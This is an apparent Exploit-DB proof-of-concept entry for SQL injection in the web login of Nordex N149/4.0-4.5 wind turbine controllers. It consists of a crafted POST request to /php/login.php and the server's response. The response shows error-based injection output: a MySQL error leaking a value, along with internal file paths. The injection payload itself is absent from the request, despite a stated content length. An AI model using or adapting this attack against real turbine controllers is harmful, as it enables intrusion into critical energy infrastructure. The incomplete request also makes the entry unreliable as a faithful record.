Nordex N149/4.0-4.5 - SQL Injection

EDB-ID: 44684
Author: t4rkd3vilz
Published: 2018-05-22
Type: Webapps
Platform: Hardware
Vulnerable App: N/A

 # Date: 21-05-2018 
# Exploit Author: t4rkd3vilz
# Vendor Homepage:
# Tested on: Windows
# Version: N149/4.0-4.5 Wind Turbine
# Category: webapps

---> Proof Of Concept

-------- > Request

POST /php/login.php HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/41.0.2272.16 Safari/537.36
Accept: */*
Referer: http://IpAdress//
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
Host: IPAdress
Accept-Encoding: gzip, deflate
Content-Length: 304
Content-Type: application/x-www-form-urlencoded; charset=UTF-8


-------- > Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 261
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=UTF-8
Date: Wed, 16 May 2018 10:49:31 GMT
Vary: Accept-Encoding

<br />
<b>Warning</b>: mysqli::query(): (23000/1062): Duplicate entry
'_!@4dilemma:1' for key 'group_key' in
<b>/share/HDA_DATA/Web/php/login.php</b> on line <b>46</b><br />
<br />
<b>Notice</b>: Trying to get property of non-object in
<b>/share/HDA_DATA/Web/php/login.php</b> on line <b>47</b><br />
FALSE<br />
<b>Fatal error</b>: Call to a member function free() on boolean in
<b>/share/HDA_DATA/Web/php/login.php</b> on line <b>67</b><br />

Related Posts